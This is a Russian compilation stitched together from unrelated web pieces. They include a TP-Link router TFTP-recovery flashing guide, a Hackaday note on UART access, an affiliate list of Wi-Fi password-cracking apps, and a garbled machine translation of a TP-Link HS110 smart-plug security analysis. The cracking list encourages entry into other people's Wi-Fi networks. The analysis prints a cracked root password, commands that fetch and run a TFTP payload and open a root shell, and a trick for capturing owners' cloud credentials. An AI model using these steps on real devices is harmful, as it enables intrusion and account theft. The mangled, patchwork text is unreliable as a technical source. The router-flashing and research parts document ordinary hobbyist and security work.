Взлом TP-Link WR740N & WR841N для OpenWRT
§ Взлом TP-Link WR740N & WR841N для OpenWRT
В своей работе мы достаточно часто используем дешёвые и простые маршрутизаторы от TP-Link для организации VPN канала. Для этой цели я приспособил OpenWRT, и выпиливая поддержку USB и WiFi мы получаем достаточно места для установки OpenVPN на маршрутизатор. В результате устройство стоимостью $25 показывает великолепную стабильность и настраиваемость.
Однако в последнее время TP-Link повинуясь давлению регулятора из США, заблокировали в своих маршрутизаторах возможность установки сторонних прошивок, дабы не допустить увеличение пользователями мощьности WiFi сигнала. И вот первая партия маршрутизаторов с новой прошивкой попалась ко мне, так что пришлось искать способ обхода этой блокировки.
На самом деле TP-Link не стала сильно заморачиваться с блокировкой, и просто внедрила какую то проверку какой-то последовательности бит в прошивке. В результате попытки установки иной прошивки (в том числе и оригинальной но старой) маршрутизатор показывал ошибку 18005, и говорил что прошивка не подходит для данного устройства.
Читая интернеты наткнулся на несколько интересных постов про распайку обычного COM-порта на плату маршрутизатора, и прошивке через этот COM порт, звучит не просто, поэтому продолжил рыть и в итоге нашёл следующий способ.
Оказывается примерно с марта 2013 года в большое количетсво маршрутизаторов TP-Link в загрузчик U-Boot был добавлен специальный модуль для «раскирпичивания» маршрутизаторов. Идея в том, что при определённых обстоятельствах U-Boot загружает модуль восстановления, который все делает практически самостоятельно, а именно:
- Запускает U-Boot и присваивает маршрутизатору IP 192.168.0.86/24
- При помощи протокола TFTP загружает с сервера с адресом 192.168.0.66 нужный файл восстановления
- Устанавливает его исключая любые проверки
- Перезагружается в новой прошивке.
Звучит вкусно, но нужно определиться с тремя вещами:
- Как сообщить маршрутизатору что необходимо запустить данную процедуру восстановления
- Как понять какой файл будет просить маршрутизатор
- Какой файл ему подкладывать. У нас как минимум есть factory image и sysupgrade.
Итак по порядку:
Что бы запустить маршрутизатор в режиме восстановления необходимо выключить его, зажать reset, удерживя reset зажатым включить, и в момент когда будут гореть только крайние лампочки (самая правая и самая левая) отпустить reset.
Что бы понять какой файл будет запрашивать наш маршрутизатор мы можем просто запустить tcpdump и посмотреть какой файл будет запрашивать маршрутизатор в запросе RQQ
tcpdump -i eth0 -n -l
В моём случае с WR740N v4.28 файл имел название wr740v4_tp_recovery.bin
Для того что бы прошить OpenWRT необходимо либо скачать образ, либо собрать самому, но образ обязательно должен быть factory, либо же можно использовать официальную прошивку от TP-Link, например на случай отката версии. DD-WRT я не пробовал, но есть подозрение что будет работать точно так же.
Итак, ещё раз пройдёмся по процессу:
- Настраиваем сервер tftpd, и кладём необходимую прошивку, предварительно переименовав её, и проверяем что файл имеет разрешения на чтение для tftpd
- Присваиваем нашему компу IP 192.168.0.66 (я делаю через алиасы ifconfig eth0:1 192.168.0.66)
- Зажимаем reset на маршрутизаторе и включаем его
- Когда загорятся только две крайних лампочки отпускаем reset и ждём пару минут.
После этого маршрутизатор перезагрузится, и на нём окажется та прошивка которую вы ему подсунули. Просто и быстро, и никаких распаиваний COM порта на матери, и прочего геммороя с патчами оригинальной прошивки… А если маршрутизаторов у вас не один — то этот способ ещё и быстрее!
Тп-линк | Хакадей
TP-Link TL-WR841N не особенно впечатляет, но, поскольку он неплохо работает и продается менее чем за 20 долларов США, это один из самых популярных потребительских маршрутизаторов на Amazon. Теперь, благодаря [TrendyTofu] из инициативы Zero Day Initiative, у нас теперь есть краткое пошаговое руководство о том, как взломать новые версии оборудования и получить полный контроль над этим выгодным WiFi-устройством. Первоначально эта работа была проделана, чтобы помочь проверить обнаруженные уязвимости в прошивке маршрутизатора, но мы уверены, что читатели Hackaday могут придумать всевозможные варианты использования этой информации.
Компания TP-Link обозначила контакты UART как. История начинается, как и многие другие до нее, с последовательного порта. Найти контактные площадки UART на печатной плате и подключить переключатель уровня не составило труда, но [TrendyTofu] обнаружил, что он работает только в одном направлении. Некоторое устранение неполадок и осциллограф позже выявили, что виновником является подтягивающий резистор 1 кОм, подключенный к линии RX, который удерживал пиковое напряжение от достаточно высокого, чтобы его можно было распознать.
После того, как двусторонняя связь была установлена, можно было приступить к правильной работе внутри операционной системы Linux маршрутизатора.Неудивительно, что ядро устарело (версия 2.6.36 от 2010 года) и что системные утилиты были урезаны до абсолютного минимума для экономии места. Полная замена прошивки, конечно, была бы идеальной, но, к сожалению, OpenWRT прекратил поддержку новых аппаратных версий TL-WR841N.
Чтобы научить эту базовую сборку Linux некоторым новым трюкам, [TrendyTofu] использовал команду mount
, чтобы найти раздел в системе, который действительно имел доступ для записи, и использовал ее для хранения предварительно скомпилированной сборки BusyBox для MIPS.С более полным набором инструментов может начаться настоящее веселье: использование GDB для отладки двоичных файлов TP-Link и поиска брешей в броне. Но не стесняйтесь вставлять здесь свой собственный бренд хаоса.
Вы можете подумать, что в эпоху Raspberry Pi злоупотреблять дешевыми маршрутизаторами, чтобы превратить их в универсальные Linux-боксы, было бы несколько не в стиле. Честно говоря, вы были бы правы. Но хотя дни, когда Linksys WRT54G привязывали к автомобилям с дистанционным управлением, возможно, давно прошли, все еще есть несколько маршрутизаторов, достаточно интересных, чтобы стоило стряхнуть пыль с этой проверенной временем традиции аппаратного хакерства.
Как взломать пароль Wi-Fi — взломать пароль Wi-Fi на Android
NECHSTAR имеет партнерские отношения (включая Amazon). Это не влияет на редакционный контент, хотя мы можем получать комиссионные за покупки по нашим ссылкам. Нажав на название устройства, изображение или кнопку, вы перейдете к списку продуктов (на Amazon или у других продавцов), где вы сможете найти более подробную информацию о продукте. Узнать больше
Хотите стать взломщиком паролей Wi-Fi и взломать пароли Wi-Fi на Android за считанные минуты?
Сеть Wi-Fi является очень важной частью смартфона, используемого для беспроводного подключения к Интернету.
Все больше и больше приложений на вашем телефоне требуют подключения к интернету и иногда бывает ситуация, что вам нужен доступ к этому приложению, но у вас нет интернета.
Если вам нужно взломать Wi-Fi без программы, лучше всего использовать приложение для взлома Wi-Fi.
В этой статье мы поделимся с вами лучшими приложениями для взлома Wi-Fi для Android и iPhone, которые помогут вам выйти из ситуации без интернета.
Отказ от ответственности – Мы не несем ответственности за любые незаконные действия.Этот список приложений и советов предназначен только для информационных целей. Мы не подталкиваем другого человека к взлому паролей Wi-Fi.
Если вы хотите взломать Wi-Fi с iPhone или Android, вам не нужно знать о безопасности сети.
Эти приложения для взлома паролей Wi-Fi не будут работать в надежных беспроводных сетях, но они могут быть полезны для взлома домашних сетей Wi-Fi.
Мы должны повторить еще раз — Быть взломщиком паролей Wi-Fi незаконно .
Как взломать пароль Wi-Fi на Android: 3 важных шага просто скачайте его.
3) Приложения для взлома Wi-Fi для Android работают по тем же принципам, во-первых, они сканируют мобильные сети, после того, как вы найдете зеленую, просто проверьте, можете ли вы взломать пароль.
Приложение Wifi Hacker для iPhone
Wifiaudit для iPhone
Это простая в использовании программа с хорошими результатами.Магазин Apple строго против таких типов приложений, поэтому возможно, что Wifiaudit может быть удален из магазина.
WiFiAudit Pro помогает вам генерировать ключи для вашей сети, анализировать вашу беспроводную сеть, генерировать ключи WPA.
Загрузить: Wifiaudit For iPhone для iOS
Приложения для взлома Wi-Fi для Android
Wifi WPS WPA Tester
Очень эффективный взломщик паролей Wi-Fi по простой причине. Вам нужно получить root-права, чтобы взломать сети WPS.Не бойтесь рутировать свой телефон.
Это простой и автоматический процесс, и с таким приложением, как KingRoot, вы можете получить root права на свой телефон Android за несколько секунд. Но учтите тот факт, что после того, как вы рутируете свой телефон, вы можете потерять гарантию.
Используйте приложение WPS WPA tester и подключитесь к некоторым маршрутизаторам, которые имеют некоторые уязвимости, и нацельтесь на них.
Это, безусловно, одно из лучших приложений для взлома паролей Wi-Fi с лучшими результатами на рынке.
Загрузить: Wifi WPS WPA Tester для Android
WiFi You
Мощное приложение, которое собирает миллионы паролей, которыми поделились пользователи. WIFI Вы храните и распространяете эти пароли с облачного сервера среди других пользователей. Найдите ключ Wi-Fi для всех доступных сетей Wi-Fi вокруг вас.
Скачать: WiFi You для Android
AndroDumpper
AndroDumpper это немного отличное приложение от остального списка, оно атакует протокол WPS, как wifislax. Это совершенно новое приложение очень мощное, и вы даже можете выбрать один из двух способов взлома Wi-Fi (с рутом или без).
Загрузить: AndroDumpper для Android
Router Keygen
Router Keygen — одно из самых известных приложений для взлома паролей Wi-Fi в магазине Google.
Сканирует беспроводные сети вокруг вас и позволяет взломать пароль для WEP и WPA шифрования .
Если вы находитесь в центре крупных городов, мы рекомендуем вам использовать это приложение. У вас есть большой шанс найти сеть, которая находится в большой базе паролей Router Keygen .
Скачать: Router Keygen для Android
HHG5XX WEP Scanner
Это приложение предназначено для взлома только специальных роутеров (модели Huawei).Если ваша цель — модель Huawei (эти типы модемов довольно распространены), вы можете успешно взломать пароль благодаря алгоритму mac2wepkey.
Загрузить: HHG5XX WEP Scanner для Android
Wireless Cracker
Позволяет пользователям Android расшифровывать пароли для многих типов сетей: Discus-XXXXXX, INFINITUMXXXXXX, Bbox-XXXXXX, DMAXYYYYYY, ThomsonXXXXXX и Orange.
Загрузить: Wireless Cracker для Android
WPS Connect
Приложение для взлома Wi-Fi для Android, для которого требуется рутированный телефон.Взломайте и подключитесь к любой защищенной паролем сети Wi-Fi. Скачайте WPS Connect и станьте взломщиком паролей Wi-Fi .
Скачать: Wifi WPS WPA Tester для Android
Wifi Kill
Wifi Kill позволяет отключить все устройства, подключенные к сети Wi-Fi. Легко блокируйте доступ в Интернет для других устройств в той же сети.
Скачать: Wifi Kill для Android
Network Spoofer
Один из лучших инструментов тестирования безопасности, доступных в магазине Google.Посмотрите, насколько сложно или легко взломать сеть Wi-Fi с помощью вашего Android-смартфона.
Загрузить: Сетевой спуфер для Android
ПРИМЕЧАНИЕ: Возможно, вы думаете, что эти приложения разве что. Вы можете иметь право. Но мы нашли другой способ, тоже нелегальный, как сломать пароль вайфай сети.
Все, что вам нужно для этой техники, это подключение к интернету, вы должны знать имя маршрутизатора и иметь тупого человека, который не изменил пароль Wi-Fi по умолчанию.
Подробнее – Как изменить пароль Wi-Fi – общие IP-адреса маршрутизаторов по умолчанию
Вы хотите взломать сеть Wi-Fi, но не знаете, как это сделать.
Большинство людей считают, что для взлома сети Wi-Fi необходимо использовать программное обеспечение или специальные приложения.
На самом деле, большое количество программ или приложений, которые вы загружаете для взлома сетей Wi-Fi, не будут работать.
Даже упомянутые в статье приложения в большинстве случаев не работают. В результате, если вы действительно хотите взломать сеть Wi-Fi, вы должны попробовать другой способ.
Вот видео, в котором вы узнаете, как взломать сети Wi-Fi, следуя простым инструкциям.
ИНСТРУМЕНТЫ НОВОГО ПОКОЛЕНИЯ ДЛЯ ОНЛАЙН-БИЗНЕСА – Роботы, которые пишут лучше вас
Копирайтинг – это сложно. Написание описаний продуктов, электронных писем или объявлений требует огромного объема работы.
Экономьте время и используйте инструменты для письма с искусственным интеллектом. Вот инструменты искусственного интеллекта для копирайтинга, которые действительно впечатляют и могут помочь вам масштабировать создание контента.
Jasper — Jasper, ранее известный как Jarvis, — это инструмент для письма с искусственным интеллектом, который помогает вам превратить ваш текст в полностью персонализированное и уникальное произведение искусства. Попробуйте Jasper с БЕСПЛАТНОЙ пробной версией на 10 000 слов прямо сейчас. Зайдите на сайт .
Rytr – Rytr практически устраняет блокировку авторов, вы можете создавать статьи быстрее, чтобы публиковать их в рекордно короткие сроки. Он также предлагает бесплатный план , который позволяет вам генерировать 5000 символов в месяц с помощью инструмента искусственного интеллекта. Перейти на сайт .
Writesonic – Мощный инструмент для письма с искусственным интеллектом, который может создавать 100% оригинальные статьи и сообщения в блогах, которые читаются так, как будто они были написаны человеком, и делают это за считанные секунды. Перейти на сайт .
Инструменты для ведения блога
Зарабатывайте больше — Пришло время начать зарабатывать на своем блоге с помощью рекламы Ezoic. Щелкните для получения более подробной информации .
Инструменты для YouTube
Не существует простого способа расширить свой канал YouTube, но существует множество инструментов, которые могут вам помочь. ПОПРОБУЙТЕ ЭТОТ мощный инструмент – бесплатное расширение TubeBuddy Chrome .
Уведомление. Некоторые из приведенных выше ссылок могут содержать партнерские соглашения, а это означает, что Nechstar без каких-либо дополнительных затрат может получить комиссию, если вы перейдете по ссылке для совершения покупки.
Обратный инжиниринг TP-Link HS110
Любомир Штройтманн, консультант, и Тобиас Эссер, консультант
TP-Link HS110 Wi-Fi — это облачная вилка питания, которую можно включать и выключать удаленно через приложение и которая предлагает функции мониторинга и планирования энергопотребления. В рамках текущих исследований в области безопасности Интернета вещей мы провели анализ безопасности, реконструировав прошивку устройства и приложение Android, проанализировав обмен данными между приложениями и между устройствами и фаззинг используемых проприетарных протоколов.
Несмотря на то, что облачная связь была признана достаточно безопасной для устройства IoT, мы обнаружили два небезопасных проприетарных протокола локальной конфигурации: удобочитаемый протокол JSON, «зашифрованный» с помощью легко обратимого шифра XOR с автоматическим ключом, и двоичный протокол конфигурации и отладки с шифрованием DES. ( TDDP — протокол отладки устройства TP-Link ). TDDP используется в большей части продуктовой линейки TP-Link, включая маршрутизаторы и точки доступа, поэтому заслуживает дальнейшего изучения. Мы также выпускаем диссектор Wireshark и два клиента Python для проприетарных протоколов на GitHub.
Содержимое
- Сводка анализа безопасности
- Настройка устройства
- Обратный инжиниринг прошивки
- Бизибокс
- Портскан
- Протокол умного дома TP-Link
- Тестовый режим
- Протокол отладки устройства TP-Link
1. Сводка анализа безопасности
Хороший:
- Облачные функции можно отключить
- Облачная связь использует HTTPS и закрепление ЦС
- Локальное хранение данных мониторинга энергопотребления
- Обновление микропрограммы проверяет подпись по ключам RSA
Плохой:
- Бесполезное шифрование для локальной связи
- Нет аутентификации: любой пользователь в локальной сети может включать и выключать умную розетку, сбрасывать ее или выводить из строя
- Облачное соединение TLS может быть перехвачено любым действительным сертификатом Symantec EV (проверяется только корневой ЦС)
- Звонки домой, даже если они настроены как местные
- Недокументированная служба настройки и отладки (TDDP)
2.Настройка устройства
Smart Plug имеет две физические кнопки: релейный переключатель включения/выключения и кнопку сброса устройства, которая перезагружает устройство, если ее нажимать в течение пяти секунд или дольше. При подключении ненастроенная или только что сброшенная интеллектуальная розетка запускает незащищенную открытую точку доступа с SSID « TP-LINK_Smart Plug_XXXX
», где XXXX — четыре шестнадцатеричных числа. Быстрый поиск на WiGLE показывает несколько ненастроенных умных розеток TP-Link в дикой природе:
Приложение «Умный дом» от TP-Link «Kasa» подключает смартфон к этой точке доступа, отправляет широковещательные пакеты UDP на номер 255.255.255.255
, чтобы найти IP-адрес Smart Plug и приступить к его настройке с помощью SSID и пароля, которые пользователь ввел в приложение. Затем Smart Plug отключает точку доступа и подключается к настроенному WiFi в качестве клиента.
Мы проводим атаку KARMA с помощью Sensepost MANA Toolkit, принудительно деаутентифицируя умную розетку и пытаясь заставить ее подключиться к мошеннической точке доступа с тем же SSID и без защиты. Атака не удалась; однако повторная деаутентификация может использоваться для выполнения временной атаки типа «отказ в обслуживании» против устройства.
3. Обратный инжиниринг прошивки TP-Link HS110
Скачиваем актуальную официальную прошивку для устройства ( HS110(US)_V1_151016.zip
) и с помощью binwalk извлекаем содержимое .bin файла:
Как мы видим, прошивка представляет собой типичную встраиваемую систему Linux и состоит из трех частей:
- Загрузчик U-Boot 1.1.4 (16 октября 2015 г. — 11:22:22)
- Ядро Linux 2.6.31 — LSDK-9.2.0_U11.14 ([email protected]локальный домен)
- Файловая система Squashfs
Исследуя содержимое файловой системы, находим следующие интересные файлы:
- /bin/busybox v1.01 (2015.10.16-03:17+0000)
- /etc/newroot2048.crt
Это сертификат, используемый для проверки подлинности облачного сервера. Файл содержит корневой сертификат «VeriSign Class 3 Public Primary Certification Authority — G5». Это означает, что единственная проверка, выполняемая при установке TLS-подключения к облаку, — это проверка того, подписан ли предоставленный сертификат сервера центром сертификации Symantec/VeriSign для сертификатов расширенной проверки (EV) (закрепление CA).Решительный злоумышленник может купить собственный сертификат EV и использовать его, чтобы выдать себя за облачный сервер.
корень: 7KBNXuMnKTx6g: 15502: 0: 99999: 7 :::
Старый пароль расшифровки тривиально взломан, пароль «media».
- /usr/bin/shd — основное серверное приложение
- /usr/bin/shdTester — клиент для калибровки энергомонитора
- /usr/bin/calDump — выгружает данные калибровки Wi-Fi из /dev/caldata
Вся проприетарная серверная логика содержится в двоичном файле shd («Демон умного дома»), который представляет собой MIPS32 R2 Big Endian
:
shd: 32-битный исполняемый файл ELF MSB, MIPS, MIPS32 rel2 версии 1 (SYSV), динамически связанный, интерпретатор /lib/ld-uClibc.so.0, поврежден размер заголовка раздела
Двоичный файл shd также содержит копию OpenSSL 1.0.1j 15 октября 2014 г.
для установления соединений TLS с облачным сервером.
Загружаем бинарник shd в IDA и начинаем анализ!
4. Бизибокс
Версия Busybox, представленная в прошивке, уязвима для CVE-2011-2716, уязвимости внедрения команд в компоненте DHCP-клиента udhcpc Busybox, которая позволяет внедрять команды оболочки в один из следующих параметров DHCP: (12) Hostname, ( 15) Имя домена, (40) домен NIS или (66) имя сервера TFTP.Чтобы это работало, эти значения должны фактически использоваться сценарием оболочки, вызывающим udhcpc. Анализируя прошивку, мы обнаруживаем, что двоичный файл shd создает сценарий оболочки /tmp/udhcpc.script
, содержащий:
#!/бин/ш если [$1 = обновить –o $1 = привязать] потом ifconfig $interface $ip сетевая маска $subnet маршрут по умолчанию маршрут добавить по умолчанию gw $router echo "сервер имен $dns" > /tmp/resolv.conf фи
Затем выполняется udhcpc:
/sbin/udhcpc –b –H «HS100(US)» –i br0 –s /tmp/udhcpc.сценарий
Как мы видим, имя хоста жестко задано, и никакие другие параметры не используются. К сожалению, уязвимость udhcpc в этом случае не может быть использована.
5. Портскан
Сканирование портов nmap на всех портах TCP и UDP показывает следующее:
Порт | Протокол |
---|---|
80/TCP | HTTP |
9999/TCP | Протокол умного дома TP-Link |
1040/удп | Протокол отладки устройств TP-Link (TDDP) |
Веб-сервер на порту 80
отвечает бессмысленным многоточием, независимо от запроса:
HTTP/1.1 200 ОК Сервер: Умная розетка TP-LINK Подключение: закрыть Длина содержимого: 5 Тип содержимого: текст/html …
Просматривая двоичный файл shd, мы видим, что подпрограмма HTTP-сервера называется « fake_httpd
» и всегда будет возвращать этот жестко запрограммированный ответ.
Порт 9999 TCP
используется для управления Smart Plug в локальной сети через приложение Kasa и описан в разделе Протокол TP-Link Smart Home. Порт 1040 UDP
описан в разделе Протокол отладки устройств TP-Link.
6. Протокол умного дома TP-Link
Анализ трафика локальной беспроводной сети показывает, что приложение TP-Link Kasa SmartHome взаимодействует с умной розеткой HS110 через TCP-порт 9999, используя данные, которые выглядят как зашифрованные.
После декомпиляции приложения Kasa для Android находим функцию шифрования:
Мы видим, что начальный ключ (вектор инициализации) i имеет жестко запрограммированное значение -85 (= 171)
. Первый байт открытого текста — это XOR
с ключом.Затем ключ устанавливается в байт открытого текста. Во время следующей итерации следующий байт открытого текста подвергается операции XOR
с предыдущим байтом открытого текста. Расшифровка работает так же, с потоком ключей, состоящим из байтов зашифрованного текста. Это известно как шифр с автоматическим ключом, и хотя он имеет лучшие статистические свойства, чем простое шифрование XOR с повторяющимся ключом, его можно легко взломать известными атаками с открытым текстом.
Теперь, когда мы знаем алгоритм и ключ, мы реализуем диссектор Wireshark в LUA, который автоматически расшифровывает пакеты TP-Link Smart Home на порту 9999
.Получается, что протокол использует JSON, поэтому мы также передаем расшифрованное содержимое в диссектор JSON. Теперь мы можем отслеживать связь между приложением Kasa и Smart Plug по локальной сети Wi-Fi:
Команды Smart Plug сгруппированы в следующие категории:
- система
- netif (команды интерфейса WLAN)
- cnCloud (облачное соединение)
- время
- эметр (счетчик энергии)
- расписание (включение/выключение по расписанию)
- count_down (включение/выключение обратного отсчета)
- anti_theft (произвольное включение/выключение по расписанию)
Мы предоставляем полный список команд JSON (tplink-smarthome-commands.txt) и клиент Python для их отправки (tplink_smartplug.py).
Системные команды
Мы можем считать информацию о системе с помощью команды get_sysinfo
:
{"система":{"get_sysinfo":{}}}
Чтобы отправить команду с помощью нашего клиента Python, вызовите ее с опцией –c
info:
./tplink_smartplug.py –t 192.168.0.1 –c информация
Мы предоставляем несколько предопределенных команд для считывания информации с интеллектуальной розетки HS110 с использованием параметров –c
.
В качестве альтернативы вы можете использовать параметр –j
и указать полную строку JSON:
./tplink_smartplug.py –t 192.168.0.1 –j '{"система":{"get_sysinfo":{}}}'
Это позволяет отправлять любые команды, перечисленные в tplink-smarthome-commands.txt
.
Ответ get_sysinfo
будет содержать следующую информацию:
Мы можем включать и выключать интеллектуальную розетку HS110 с помощью команды set_relay_state
, используя 1
для включения и 0
для выключения:
{"система":{"set_relay_state":{"состояние":1}}}
Мы можем перезагрузить интеллектуальную розетку HS110 с помощью команды reboot
, для которой требуется параметр delay
в секундах:
{"система":{"перезагрузка":{"задержка":1}}}
Умную розетку HS110 можно сбросить до заводских настроек, чтобы она снова работала как открытая точка доступа:
{"система":{"сброс":{"задержка":1}}}
Обратите внимание: поскольку протокол не обеспечивает аутентификацию, любой пользователь в вашей сети может отправить эту команду и принудительно выполнить сброс.Здесь шутник устанавливал большое значение задержки, давая ему время покинуть помещение.
Существуют дополнительные команды для изменения MAC-адреса, изменения идентификаторов устройства и оборудования, выключения светодиодного индикатора устройства (ночной режим) и т. д.
Особый интерес представляют команды прошивки. Вы можете загрузить файл прошивки с произвольного URL-адреса, используя:
{"система":{"download_firmware":{"url":"http://..."}}}
Во время загрузки вы можете получить состояние загрузки, используя:
{"система":{"get_download_state":{}}}
После завершения загрузки вы можете прошить прошивку, используя:
{"система":{"flash_firmware":{}}}
Прошить модифицированный образ не получится, так как подпись образа должна совпадать с одним из четырех жестко запрограммированных ключей RSA (не будем вдаваться в дикие домыслы, почему здесь четыре ключа):
Команды Wi-Fi
Вы можете указать интеллектуальной розетке HS110 сканировать список ближайших точек доступа:
{"netif":{"get_scaninfo":{"обновить":1}}}
Будет возвращен список всех доступных видимых точек доступа в области.
Подключение к точке доступа с заданным SSID и паролем выполняется с помощью команды set_stainfo
( key_type 3
указывает WPA2):
{"netif":{"set_stainfo":{"ssid":"WiFi","пароль":"123","key_type":3}}}
Обратите внимание, что все команды JSON принимаются независимо от состояния устройства! Подключение к точке доступа будет необходимо только в ненастроенном состоянии, когда интеллектуальная розетка HS110 действует как точка доступа. Используя команду set_stainfo
, вы можете заставить Plug подключаться к другому Wi-Fi на лету.
Облачные команды
Smart Plug HS110 регулярно пытается подключиться к облачному серверу TP-Link по адресу devs.tplinkcloud.com:50443
, используя TLS. Это поведение сохраняется, даже если интеллектуальная розетка HS110 настроена как «только локальная» в приложении Kasa. К счастью для нас, есть команда для изменения URL-адреса облачного сервера:
{"cnCloud":{"set_server_url":{"сервер":"devs.tplinkcloud.com"}}}
Двоичный файл shd пытается установить соединение TLS 1.0 с предоставленным URL-адресом и проверяет, подписан ли сертификат сервера корневым центром сертификации Symantec EV, хранящимся под /etc/newroot2048.
. Злоумышленник с необходимыми средствами может приобрести действующий сертификат EV и выполнить атаку «Человек посередине» на связь между HS110 Smart Plug и облаком.
Чтобы зарегистрировать устройство в облаке, мы запускаем команду bind и указываем действительное имя облачной учетной записи и пароль:
{"cnCloud":{"bind":{"имя пользователя":[email protected], "пароль":"секрет"}}}
Интересно отметить, что регистрация завершится ошибкой, если hwID умной розетки неизвестен облачному серверу.Это означает, что TP-Link либо выполняет проверку контрольной суммы, либо другой тип проверки правдоподобия, либо проверяет полный список устройств. В любом случае, это позволяет TP-Link отслеживать все устройства на протяжении всего их срока службы.
Вы можете отменить регистрацию устройства в облачной учетной записи, используя unbind:
{"cnCloud":{"отвязать":null}}
Это позволяет злоумышленнику в локальной сети отменить регистрацию устройства, вынуждая владельца устройства зарегистрироваться снова. Затем злоумышленник может перехватить команду регистрации привязки, отправленную приложением Kasa, и увидеть tplinkcloud владельца.com учетные данные в открытом виде!
7. Тестовый режим
Анализируя бинарный файл shd, мы обнаружили скрытый «тестовый режим» в умной розетке HS110. Его можно вызвать удаленно или через аргумент командной строки для двоичного файла shd.
7.1 Тестовый режим командной строки
Двоичный файл shd можно запустить с помощью параметра –t, который переводит его в тестовый режим:
Это вызывает функцию с именем wlan_start_art
, которая выглядит многообещающе, поскольку выполняет клиентский код Atheros Radio Test (ART) для тестирования производительности беспроводных адаптеров Atheros.Этот фрагмент отладочного кода уже приводил к уязвимости в маршрутизаторах TP-Link в 2013 году, когда его можно было активировать с помощью скрытого URL-адреса на веб-сервере устройства: TP-Link http/tftp backdoor
Функция wlan_start_art
запускает следующие системные команды:
LD_LIBRARY_PATH=/tmp арпинг –I br0 –c 1 192.168.0.100 tftp –g 192.168.0.100 –r ap_bin/ap121/art.ko –l /tmp/art.ko insmod /tmp/art.ko tftp –g 192.168.0.100 –r ap_bin/ap121/nart.out –l /tmp/nart.из chmod +x /tmp/nart.out /tmp/nart.out – экземпляр 0 и
Команды подключаются к TFTP-серверу, загружают файл с именем nart.out
, делают его исполняемым и запускают. Это может быть легко использовано для рутирования устройства. Все, что нужно сделать, это разместить сценарий оболочки с именем nart.out
на TFTP-сервере с IP-адресом 192.168.0.100
по пути ap_bin/ap121/
. Сценарий оболочки запустит демон telnetd busybox:
/bin/busybox telnetd –l/bin/sh &
Однако у нас нет возможности вызвать двоичный файл shd на устройстве с параметром –t.
7.2 Режим удаленного тестирования
Просматривая все команды JSON в двоичном файле shd, мы находим команду с именем set_test_mode
. Это означает, что тестовый режим может быть включен удаленно!
Это единственная команда JSON, которая в качестве примитивной защиты требует, чтобы запрос исходил из IP-адреса 192.168.0.100
. Самый простой способ сделать это — перезагрузить умную розетку HS110 и подключиться к ее точке доступа, поскольку DHCP-сервер настроен на выдачу IP-адресов, начинающихся с 192.168.0.100
. Далее отправьте команду set_test_mode:
./tplink-smarthome.py -t 192.168.0.1 -j '{"system":{"set_test_mode":{"enable":1}}}'
Записывает специальный флаг тестового режима в NVRAM устройства. Флаг проверяется во время загрузки, и если он установлен, интеллектуальная розетка HS110 загружается в тестовый режим.
Перезагрузите Smart Plug, используя:
./tplink-smarthome.py -t 192.168.0.1 -c перезагрузка
Умная розетка попытается подключиться к точке доступа с защитой WPA2 с SSID « hs_test
» и паролем « 12345670
», а затем включит реле розетки:
Чтобы настроить точку доступа hs_test
, мы используем hostapd со следующим hostapd.конф:
интерфейс=wlan0 драйвер = nl80211 ssid=hs_test wpa=2 wpa_passphrase=12345670 канал=1
Как и ожидалось, интеллектуальная розетка HS110 подключается к нашей точке доступа hs_test
. Затем мы наблюдаем, как Smart Plug выполняет обычную настройку: запрашивает IP-адрес через DHCP, синхронизирует время с помощью сервера из NTP-пула ( cn.pool.ntp.org
) и подключается к облачному серверу TP-Link по адресу devs.tplinkcloud.com:50443
.
К сожалению, поведение Smart Plug в тестовом режиме ничем не отличалось от поведения после обычной загрузки.Хотя в коде удаленного тестового режима есть ссылка на функцию wlan_start_art
, она находится в части без каких-либо ссылок, ведущих к ней. Вероятно, это означает, что вызов функции для этой части был закомментирован.
8. Протокол отладки устройства TP-Link
Сканирование портов интеллектуальной розетки HS110 выявило открытый порт UDP 1040
. Анализируя двоичный файл shd для вызовов setsockopt()
, мы могли видеть, что порт привязан компонентом под названием «TDDP».Протокол казался бинарным и разработан очень незаметно, так что никакой ответ не дается, если на порт не отправлен полностью действительный пакет. Реверс-инжиниринг протокола был бы новой важной задачей, и, к счастью, нам не пришлось этого делать.
Взлом по патенту
После небольшого поиска в Google «TP-Link» и «TDDP» мы обнаружили, что протокол был запатентован в Китае как патенты « CN 102096654 A
» и « CN 102123140 B
», которые Google автоматически переводит. на английский:
http://www.google.com/patents/CN102096654A?cl=en
Полная спецификация протокола включена в описание патента и показывает, как создать пакет TDDP.
TDDP можно использовать для проверки связи или обнаружения устройств TP-Link в сети с помощью широковещательных передач, чтения и установки параметров конфигурации и выполнения специальных команд для конкретных устройств. TDDP обеспечивает целостность посредством дайджеста MD5 всего пакета, включенного в заголовок пакета:
.
Он также шифрует полезную нагрузку пакета с помощью DES.Это означает, что любые данные конфигурации, которые мы считываем, будут зашифрованы в ответе, и любая конфигурация, которую мы хотим записать, должна быть отправлена в зашифрованном виде.
Ключ DES определяется путем объединения имени пользователя и пароля устройства, построения хэш-функции MD5 этой строки и последующего использования первой половины MD5 (16-значное шестнадцатеричное число или 8 байтов) или в качестве ключа DES:
md5(имя пользователя + пароль)[:16]
Поскольку интеллектуальная розетка HS110 не обеспечивает никакой аутентификации, имя пользователя и пароль жестко запрограммированы в двоичном файле shd как admin/admin:
Для других устройств TP-Link это означает, что у злоумышленника есть высокоэффективный способ проверить пароли по умолчанию и выполнить офлайн-атаку методом грубой силы при входе в систему.
С помощью одного UDP-пакета они могут запросить информацию, которая уже известна (мы обнаружили запрос Heartbeat/ping в SmartPlug, который всегда возвращает «ABCD0110») или может быть легко определена (например, MAC-адрес). Затем зашифрованный ответ может быть взломан в автономном режиме с использованием различных комбинаций имени пользователя (вероятно, «admin») и пароля.
Мы предоставляем очень простой клиент TDDP для проверки концепции, который пытается считать одно из трех значений с устройства TP-Link, используя тип пакета 0x03
и определенные шестнадцатеричные значения в поле заголовка «SubType»:
0x0A
возвращает тестовую строку « ABCD0110
», 0x012
возвращает идентификатор устройства, а 0x14
возвращает идентификатор оборудования.Они могут возвращать разные типы информации на других типах устройств TP-Link. Мы также обнаружили дополнительные значения, которые изменили идентификатор устройства ( 0x13
, 0x15
), идентификатор оборудования ( 0x12
) и MAC-адрес ( 0x06
).
Двоичный протокол TDDP заслуживает дальнейшего изучения , так как он доступен на широком спектре устройств TP-Link. Возможность специальных команд для конкретных устройств ( CMD_SPE_OPR
) может раскрыть недокументированные функции, уязвимости или даже лазейки.В качестве следующего шага необходимо провести фаззинг различных устройств TP-Link с полным диапазоном шестнадцатеричных значений в заголовке TDDP, а также отслеживать и анализировать их поведение.
ОБНОВЛЕНИЕ 19.06.2018 :
